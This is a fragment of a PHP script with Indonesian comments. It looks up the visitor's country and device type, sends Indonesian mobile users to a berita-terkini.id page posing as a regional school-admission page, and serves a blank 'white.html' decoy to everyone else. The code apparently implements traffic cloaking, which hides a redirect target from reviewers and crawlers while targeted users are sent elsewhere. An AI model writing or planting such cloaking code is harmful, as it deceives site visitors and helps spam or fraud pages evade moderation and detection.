'; print_r($data); echo ''; // Periksa apakah key 'country' ada dalam data $country = isset($data['country']) ? $data['country'] : null; // Mendapatkan user agent $userAgent = $_SERVER['HTTP_USER_AGENT']; // Debug: Tampilkan user-agent echo "User-Agent: " . $userAgent . "
"; echo "Country: " . $country . "
"; // Deteksi perangkat mobile include_once('Mobile_Detect.php'); // Menambahkan library Mobile Detect $detect = new Mobile_Detect; $isMobile = $detect->isMobile(); // Cek apakah perangkat mobile // Debug: Tampilkan status mobile echo "Is Mobile: " . ($isMobile ? 'Yes' : 'No') . "
"; // Pastikan jika negara Indonesia dan mobile, redirect ke landing page if ($country === 'Indonesia' && $isMobile) { header("Location: https://berita-terkini.id/ppdb-halmaheraselatankab/"); exit(); // Pastikan untuk menghentikan eksekusi lebih lanjut } else { echo file_get_contents('white.html'); // Menampilkan halaman putih } } else { echo 'Tidak dapat mengambil data dari API.'; } ?>